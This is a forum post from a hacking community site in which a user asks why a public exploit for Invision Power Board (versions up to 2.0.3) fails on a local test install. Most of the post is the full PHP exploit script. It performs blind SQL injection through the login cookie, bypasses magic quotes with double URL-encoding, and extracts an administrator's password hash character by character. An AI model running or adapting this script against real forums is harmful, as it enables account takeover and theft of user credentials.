Welcome to HBH! If you had an account on hellboundhacker.org you will need to reset your password using the Lost Password system before you will be able to login.

IPB exploit - can't get it work

  1. Home
  2. Forum
  3. Web hacking
  4. IPB exploit - can't get it work

ghost's Avatar

ghost

0 0

I fould this exploit for Invision power board. It shoud work till 2.0.3 version. So, I install test forum (version 2.0.3) on my localhost but I can't get it work.

  • First of all does anybody get it work??
  • Second I try to use this script (Of cause I correct server and file variable), didn't work I get just 0s for result.
  • Is there maybe a problem with user id (I have 2 users on my test forum, I change variable id to 1), didn't work.

Any idea?

/*
<= 2.0.3
<= 1.3.1 Final
/str0ke
*/

$server = "SERVER";
$port = 80;
$file = "PATH";

$target = 81;

/* User id and password used to fake-logon are not important. '10' is a
random number. */
$id = 10;
$pass = "";

$hex = "0123456789abcdef";
for($i = 1; $i <= 32; $i++ ) {
  $idx = 0;
  $found = false;

  while( !($found) ) {
    $letter = substr($hex, $idx, 1);
  
    /* %2527 translates to %27, which gets past magic quotes.This is translated to ' by urldecode. */
    $cookie ="member_id=$id;pass_hash=$pass%2527%20OR%20id=$target";
    $cookie .="%20HAVING%20id=$target%20AND%20MID(`password`,$i,1)=%2527" . $letter;
  
    /* Query is in effect: SELECT * FROM ibf_members
        WHERE id=$id AND password='$pass' ORid=$target
        HAVING id=$target AND MID(`password`,$i,1)='$letter' */
  
    $header = getHeader($server, $port, $file . "index.php?act=Login&CODE=autologin", $cookie);
    if( !preg_match('/Location:(.*)act\=Login\&CODE\=00\r\n/', $header) ) {
      echo $i . ": " . $letter . "\n";
      $found = true;
  
      $hash .= $letter;
    } else {
      $idx++;
    }
  }
}

echo "\n\nFinal Hash: $hash\n";

function getHeader($server, $port, $file, $cookie) {
  $ip = gethostbyname($server);
  $fp = fsockopen($ip, $port);

  if (!$fp) {
      return "Unknown";
  } else {
    $com = "HEAD $file HTTP/1.1\r\n";
    $com .= "Host: $server:$port\r\n";
    $com .= "Cookie: $cookie\r\n";
    $com .= "Connection: close\r\n";
    $com .= "\r\n";

    fputs($fp, $com);

    do {
        $header.= fread($fp, 512);
    } while( !preg_match('/\r\n\r\n$/',$header) );
  }

  return $header;
}
?>```